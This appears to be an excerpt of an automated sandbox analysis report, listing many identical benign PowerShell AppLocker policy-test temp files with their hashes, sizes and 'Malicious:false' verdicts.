                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1shqtyqv.plm.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25cea5qy.l0y.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2dm3hxcr.ewn.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2gkihg5m.ppp.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ngb1rtg.onu.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32tkrfjs.5e2.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34afmi52.3ls.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3cvwt23p.lrk.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3itc2pmm.qlg.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3xnxpr2p.11q.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_51yzg1tr.brv.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_am1tvtsi.juy.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b0dvs3vf.yhx.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cgwblo0e.j4k.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dh12v4ha.krh.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dikag5c0.by5.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmqflodi.x3a.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_egepd1g0.u02.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ejh2t4yl.qcf.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eogayby1.23x.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fxb4y24o.vuw.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g42zh0wz.41t.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ghjx40aj.uut.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hlmpxjcb.bol.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j3r2jyw5.apk.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ju3gc3yd.n00.psm1

                                                                                                                                                                      Download File
